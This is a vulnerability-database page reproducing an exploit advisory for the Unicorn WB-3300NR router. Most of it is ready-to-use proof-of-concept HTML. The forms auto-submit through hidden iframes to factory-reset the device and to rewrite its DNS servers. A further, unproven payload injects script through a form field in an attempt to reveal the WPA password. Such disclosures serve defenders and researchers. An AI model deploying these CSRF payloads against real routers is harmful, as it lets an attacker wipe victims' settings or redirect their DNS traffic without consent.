Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 33 Views

Unicorn Router WB-3300NR CSRF Vulnerabilities with Factory Reset and DNS Chang

Code

                                                # Exploit Title:     Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    October 29th 2013   
# Vendor Homepage:   http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr    
# Tested on:         Unicorn WB-3300NR v1.0
# Firmware Version:  V5.07.18_ko_UIS02       

***************
*Vulnerability*
***************
The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require authentication, countless exploits exist.

******************
*Proof of Concept*
******************

1) Factory Reset

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/SysToolRestoreSet" method="post" target="cantseeme">
<input type="hidden" name="CMD" value='SYS_CONF'>
<input type="hidden" name="GO" value='system_reboot.asp'>
<input type="hidden" name="CCMD" value='0'>
<script>document.csrf_form.submit();</script>
</body></html>


2) Alter the DNS Settings

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/AdvSetDns" method="post" target="cantseeme">
<input type="hidden" name="GO" value='wan_dns.asp'>
<input type="hidden" name="rebootTag" value=''>
<input type="hidden" name="DSEN" value='1'>
<input type="hidden" name="DNSEN" value='on'>
<input type="hidden" name="DS1" value='8.8.4.4'>
<input type="hidden" name="DS2" value='8.8.8.8'>
<script>document.csrf_form.submit();</script>
</body></html>


3) WPA Password Disclosure (possibility)(not proven)

The following PoC code only demostrates that with CSRF and XSS, it might be possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to factory defaults.

<html><body>
<iframe height=0 width=0 id="cantseeme" name="cantseeme"></iframe>
<form name="csrf_form" action="http://192.168.123.254/goform/WizardHandle" method="post" target="cantseeme">
<input type="hidden" name="MACC" value='"; var x = ""; function y() {alert(def_wirelesspassword);} x = window.setTimeout(y,2000);//'>
<script>document.csrf_form.submit();</script>
</body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
unicorn routercsrfvulnerabilitiesfactory resetdns changeauthenticationexploitfirmware versionwpa password disclosure
33